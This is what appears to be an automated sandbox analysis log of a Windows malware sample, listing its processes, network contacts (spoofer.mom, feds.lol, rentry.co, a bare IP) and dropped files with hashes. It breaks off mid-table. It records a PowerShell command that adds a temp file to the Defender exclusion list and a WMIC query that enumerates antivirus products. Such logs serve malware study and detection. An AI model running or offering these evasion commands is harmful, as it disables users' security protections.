powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp'; Add-MpPreference -ExclusionPath $filePath"
C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp
C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
C:\Windows\System32\Wbem\WMIC.exe
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3056 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | spoofer.mom | udp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 8.8.8.8:53 | 244.73.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.169.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| N/A | 127.0.0.1:55844 | tcp | |
| N/A | 127.0.0.1:55846 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:55892 | tcp | |
| N/A | 127.0.0.1:55894 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 8.8.8.8:53 | feds.lol | udp |
| US | 104.21.35.133:443 | feds.lol | tcp |
| N/A | 127.0.0.1:55905 | tcp | |
| N/A | 127.0.0.1:55907 | tcp | |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 104.26.2.16:443 | rentry.co | tcp |
| US | 104.26.2.16:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | 133.35.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.2.26.104.in-addr.arpa | udp |
| US | 104.26.2.16:443 | rentry.co | tcp |
| US | 104.254.246.35:80 | 104.254.246.35 | tcp |
| US | 104.254.246.35:80 | 104.254.246.35 | tcp |
| US | 8.8.8.8:53 | 35.246.254.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | unpkg.com | udp |
| US | 104.17.246.203:443 | unpkg.com | tcp |
| US | 8.8.8.8:53 | open.spotify.com | udp |
| US | 151.101.3.42:443 | open.spotify.com | tcp |
| US | 8.8.8.8:53 | certificates.starfieldtech.com | udp |
| US | 192.124.249.36:80 | certificates.starfieldtech.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 203.246.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.3.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 8.8.8.8:53 | i.scdn.co | udp |
| NL | 2.18.121.91:443 | i.scdn.co | tcp |
| US | 8.8.8.8:53 | embed-cdn.spotifycdn.com | udp |
| US | 199.232.214.250:443 | embed-cdn.spotifycdn.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 104.16.79.73:443 | static.cloudflareinsights.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 199.232.214.250:443 | embed-cdn.spotifycdn.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.79.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o22381.ingest.sentry.io | udp |
| US | 34.120.195.249:443 | o22381.ingest.sentry.io | tcp |
| US | 8.8.8.8:53 | encore.scdn.co | udp |
| NL | 2.18.121.91:443 | encore.scdn.co | tcp |
| NL | 2.18.121.91:443 | encore.scdn.co | tcp |
| US | 8.8.8.8:53 | 249.195.120.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apresolve.spotify.com | udp |
| US | 35.186.224.24:443 | apresolve.spotify.com | tcp |
| US | 35.186.224.24:443 | apresolve.spotify.com | udp |
| US | 8.8.8.8:53 | api.iconify.design | udp |
| US | 172.67.71.159:443 | api.iconify.design | tcp |
| US | 8.8.8.8:53 | 24.224.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.71.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.unisvg.com | udp |
| US | 172.67.163.187:443 | api.unisvg.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| IE | 2.18.24.8:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | gew1-spclient.spotify.com | udp |
| US | 35.186.224.26:443 | gew1-spclient.spotify.com | tcp |
| US | 35.186.224.26:443 | gew1-spclient.spotify.com | tcp |
| US | 35.186.224.26:443 | gew1-spclient.spotify.com | tcp |
| US | 35.186.224.26:443 | gew1-spclient.spotify.com | tcp |
| US | 8.8.8.8:53 | 187.163.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.24.18.2.in-addr.arpa | udp |
| US | 35.186.224.26:443 | gew1-spclient.spotify.com | udp |
| US | 8.8.8.8:53 | spclient.wg.spotify.com | udp |
| US | 35.186.224.24:443 | spclient.wg.spotify.com | tcp |
| US | 8.8.8.8:53 | web-sdk-assets.spotifycdn.com | udp |
| US | 199.232.214.250:443 | web-sdk-assets.spotifycdn.com | tcp |
| US | 8.8.8.8:53 | 26.224.186.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.121.18.2.in-addr.arpa | udp |
| US | 104.254.246.35:80 | 104.254.246.35 | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49721 | tcp | |
| N/A | 127.0.0.1:49723 | tcp | |
| N/A | 127.0.0.1:49819 | tcp | |
| N/A | 127.0.0.1:49821 | tcp | |
| N/A | 127.0.0.1:49825 | tcp | |
| N/A | 127.0.0.1:49827 | tcp | |
| N/A | 127.0.0.1:49830 | tcp | |
| N/A | 127.0.0.1:49832 | tcp | |
| N/A | 127.0.0.1:49835 | tcp | |
| N/A | 127.0.0.1:49837 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49846 | tcp | |
| N/A | 127.0.0.1:49848 | tcp | |
| N/A | 127.0.0.1:49851 | tcp | |
| N/A | 127.0.0.1:49853 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49856 | tcp | |
| N/A | 127.0.0.1:49858 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49862 | tcp | |
| N/A | 127.0.0.1:49864 | tcp | |
| N/A | 127.0.0.1:49867 | tcp | |
| N/A | 127.0.0.1:49869 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49872 | tcp | |
| N/A | 127.0.0.1:49874 | tcp | |
| N/A | 127.0.0.1:49877 | tcp | |
| N/A | 127.0.0.1:49879 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49882 | tcp | |
| N/A | 127.0.0.1:49884 | tcp | |
| N/A | 127.0.0.1:49887 | tcp | |
| N/A | 127.0.0.1:49889 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49894 | tcp | |
| N/A | 127.0.0.1:49896 | tcp | |
| N/A | 127.0.0.1:49899 | tcp | |
| N/A | 127.0.0.1:49901 | tcp | |
| N/A | 127.0.0.1:49905 | tcp | |
| N/A | 127.0.0.1:49907 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49912 | tcp | |
| N/A | 127.0.0.1:49914 | tcp | |
| N/A | 127.0.0.1:49917 | tcp | |
| N/A | 127.0.0.1:49919 | tcp | |
| N/A | 127.0.0.1:49922 | tcp | |
| N/A | 127.0.0.1:49924 | tcp | |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49927 | tcp | |
| N/A | 127.0.0.1:49929 | tcp | |
| N/A | 127.0.0.1:49932 | tcp | |
| N/A | 127.0.0.1:49934 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:49937 | tcp | |
| N/A | 127.0.0.1:49939 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| NL | 52.111.243.30:443 | tcp | |
| N/A | 127.0.0.1:57797 | tcp | |
| N/A | 127.0.0.1:57799 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57802 | tcp | |
| N/A | 127.0.0.1:57804 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57807 | tcp | |
| N/A | 127.0.0.1:57809 | tcp | |
| N/A | 127.0.0.1:57812 | tcp | |
| N/A | 127.0.0.1:57814 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:57818 | tcp | |
| N/A | 127.0.0.1:57820 | tcp | |
| N/A | 127.0.0.1:57824 | tcp | |
| N/A | 127.0.0.1:57826 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57830 | tcp | |
| N/A | 127.0.0.1:57832 | tcp | |
| N/A | 127.0.0.1:57835 | tcp | |
| N/A | 127.0.0.1:57837 | tcp | |
| N/A | 127.0.0.1:57840 | tcp | |
| N/A | 127.0.0.1:57842 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57846 | tcp | |
| N/A | 127.0.0.1:57848 | tcp | |
| N/A | 127.0.0.1:57851 | tcp | |
| N/A | 127.0.0.1:57853 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57856 | tcp | |
| N/A | 127.0.0.1:57858 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57861 | tcp | |
| N/A | 127.0.0.1:57863 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57866 | tcp | |
| N/A | 127.0.0.1:57868 | tcp | |
| N/A | 127.0.0.1:57872 | tcp | |
| N/A | 127.0.0.1:57874 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57877 | tcp | |
| N/A | 127.0.0.1:57879 | tcp | |
| N/A | 127.0.0.1:57882 | tcp | |
| N/A | 127.0.0.1:57884 | tcp | |
| N/A | 127.0.0.1:57887 | tcp | |
| N/A | 127.0.0.1:57889 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57893 | tcp | |
| N/A | 127.0.0.1:57895 | tcp | |
| N/A | 127.0.0.1:57898 | tcp | |
| N/A | 127.0.0.1:57900 | tcp | |
| N/A | 127.0.0.1:57903 | tcp | |
| N/A | 127.0.0.1:57905 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57910 | tcp | |
| N/A | 127.0.0.1:57912 | tcp | |
| N/A | 127.0.0.1:57915 | tcp | |
| N/A | 127.0.0.1:57917 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57921 | tcp | |
| N/A | 127.0.0.1:57923 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57926 | tcp | |
| N/A | 127.0.0.1:57928 | tcp | |
| N/A | 127.0.0.1:57931 | tcp | |
| N/A | 127.0.0.1:57933 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57936 | tcp | |
| N/A | 127.0.0.1:57938 | tcp | |
| N/A | 127.0.0.1:57942 | tcp | |
| N/A | 127.0.0.1:57944 | tcp | |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57947 | tcp | |
| N/A | 127.0.0.1:57949 | tcp | |
| N/A | 127.0.0.1:57952 | tcp | |
| N/A | 127.0.0.1:57954 | tcp | |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| US | 104.21.73.244:443 | spoofer.mom | tcp |
| N/A | 127.0.0.1:57958 | tcp | |
| N/A | 127.0.0.1:57960 | tcp | |
| N/A | 127.0.0.1:57963 | tcp | |
| N/A | 127.0.0.1:57965 | tcp | |
| N/A | 127.0.0.1:57968 | tcp | |
| N/A | 127.0.0.1:57970 | tcp | |
| US | 104.21.73.244:443 | tcp |
Files
memory/116-0-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-1-0x00007FFB6EC10000-0x00007FFB6EC12000-memory.dmp
memory/116-2-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-3-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-4-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-6-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-5-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-7-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/3912-11-0x000001A446540000-0x000001A446541000-memory.dmp
memory/3912-10-0x000001A446520000-0x000001A446529000-memory.dmp
memory/116-13-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/3912-14-0x000001A446520000-0x000001A446529000-memory.dmp
memory/116-20-0x00007FFB6EC10000-0x00007FFB6EC11000-memory.dmp
memory/116-21-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-22-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-24-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-23-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-25-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-26-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-27-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-28-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-29-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-30-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-31-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-32-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-33-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-34-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-35-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-36-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-37-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-38-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-39-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-40-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-41-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-42-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-43-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-44-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-46-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-45-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-47-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-48-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-49-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-50-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-51-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-52-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-53-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-54-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-55-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-56-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-57-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-58-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-59-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-60-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-61-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-62-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-63-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-64-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | b704c9ca0493bd4548ac9c69dc4a4f27 |
| SHA1 | a3e5e54e630dabe55ca18a798d9f5681e0620ba7 |
| SHA256 | 2ebd5229b9dc642afba36a27c7ac12d90196b1c50985c37e94f4c17474e15411 |
| SHA512 | 69c8116fb542b344a8c55e2658078bd3e0d3564b1e4c889b072dbc99d2b070dacbc4394dedbc22a4968a8cf9448e71f69ec71ded018c1bacc0e195b3b3072d32 |
\??\pipe\LOCAL\crashpad_60_YXNMLKCYBZRUIHJP
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 477462b6ad8eaaf8d38f5e3a4daf17b0 |
| SHA1 | 86174e670c44767c08a39cc2a53c09c318326201 |
| SHA256 | e6bbd4933b9baa1df4bb633319174de07db176ec215e71c8568d27c5c577184d |
| SHA512 | a0acc2ef7fd0fcf413572eeb94d1e38aa6a682195cc03d6eaaaa0bc9e5f4b2c0033da0b835f4617aebc52069d0a10b52fc31ed53c2fe7943a480b55b7481dd4e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e7e7ae6225f422731d5fe2c6ff83ee03 |
| SHA1 | e388575ce047c814c955fca1521f271237f8790e |
| SHA256 | c1314148b3079210dad1da78508e0c7789ed0e0e910293783d0c38aca3bc44e9 |
| SHA512 | 52304c1792a053a398bb514569abac12e0e053ad7d0b6d372ca1d72547e42ffe414a0633261e22fafd4ed21532facfd9f680e6faa2a25e8b81096e3f3992dec4 |
C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe
| MD5 | b7802d686f7c65282cd7b6a45142a98b |
| SHA1 | feb041fef423f8404d2ef046b21c506e60cac3b7 |
| SHA256 | e19f99f3434059e5fc38f3dcf1c89387309af2966b90b0a24f0fa22bdc393dcd |
| SHA512 | 463d1ce3edec83623df093f7b4a13e430cad4ecc3aaeff20d660d4a7c30929583aacba51d06706623e37b3051f8447ab644bcd45ee89c0fbb591fd1729dcc6ce |
memory/116-94-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/4920-95-0x00000162F5A50000-0x00000162F5A72000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i00iqxsj.itt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp
| MD5 | 8eec510e57f5f732fd2cce73df7b73ef |
| SHA1 | 3c0af39ecb3753c5fee3b53d063c7286019eac3b |
| SHA256 | 55f7d9e99b8e2d4e0e193b2f0275501e6d9c1ebd29cadbea6a0da48a8587e3e0 |
| SHA512 | 73bbf698482132b5fd60a0b58926fddec9055f8095a53bc52714e211e9340c3419736ceafd6b279667810114d306bfccdcfcddf51c0b67fe9e3c73c54583e574 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/116-131-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-166-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 185ac4ccc51958a351852deab0f57aba |
| SHA1 | 2f0711cb336afa215b2564019618c5565db83424 |
| SHA256 | 71e33d314764d00c77a0df400318c84e6084617b72ce4b78fd2dd6f7f23344f2 |
| SHA512 | ba7006332a3c773818b0fb3dcf8442276d87b6b00ae895169d0d8483f22ba703efe928eb6c8a9e8307f4d31155fa81339ae35b3bf20bc29b3b884fe83613bf0f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 8da3242060fc8154283b2a8feaf355de |
| SHA1 | 9a5cc0a2f547c82b29c188211c7b6798fd575b56 |
| SHA256 | d582d6b9b29cd332a4aba80b851c462853e746e4eebbe26d9f84cc320c713e5a |
| SHA512 | 8b2f19b5a84cabb988ce9a1ad2a80240594f16039d03391c230d7a9ff9ffc502ae9fc74860c360c84007aebfedc7243c4164d5a508f337bd7f7f704f057d3cba |
memory/116-214-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-213-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-223-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-226-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-227-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-229-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
memory/116-228-0x00007FF6D66E0000-0x00007FF6D73DB000-memory.dmp
memory/116-230-0x00007FFB6EB70000-0x00007FFB6ED65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp
| MD5 | 172115efeb607a86fa7b2eb2eef1e673 |
| SHA1 | e6cc856e1fba6f09bb203fbdb587000765389f18 |
| SHA256 | ae1cc628b12f3495c50e96aca3c42a124739665a9e5ddc437cf98762d564ae9f |
| SHA512 | 59c290093adfcec817328d10ee8af92389c4953923b7b5865224cb7aef8665905d5c8b8b1cd016bb09baabf642009297495b189f69df4fe227983bb43d56a20d |
C:\Users\Admin\AppData\Local\Temp\_MEI25002\ucrtbase.dll
| MD5 | 0e0bac3d1dcc1833eae4e3e4cf83c4ef |
| SHA1 | 4189f4459c54e69c6d3155a82524bda7549a75a6 |
| SHA256 | 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae |
| SHA512 | a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd |
C:\Users\Admin\AppData\Local\Temp\_MEI25002\python312.dll
| MD5 | 550288a078dffc3430c08da888e70810 |
| SHA1 | 01b1d31f37fb3fd81d893cc5e4a258e976f5884f |
| SHA256 | 789a42ac160cef98f8925cb347473eeeb4e70f5513242e7faba5139ba06edf2d |
| SHA512 | 7244432fc3716f7ef27630d4e8fbc8180a2542aa97a01d44dca260ab43966dd8ac98b6023400b0478a4809aace1a128f1f4d6e544f2e591a5b436fd4c8a9d723 |
C:\Users\Admin\AppData\Local\Temp\_MEI25002\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
C:\Users\Admin\AppData\Local\Temp\_MEI25002\_ctypes.pyd
| MD5 | 2a834c3738742d45c0a06d40221cc588 |
| SHA1 | 606705a593631d6767467fb38f9300d7cd04ab3e |
| SHA256 | f20dfa748b878751ea1c4fe77a230d65212720652b99c4e5577bce461bbd9089 |
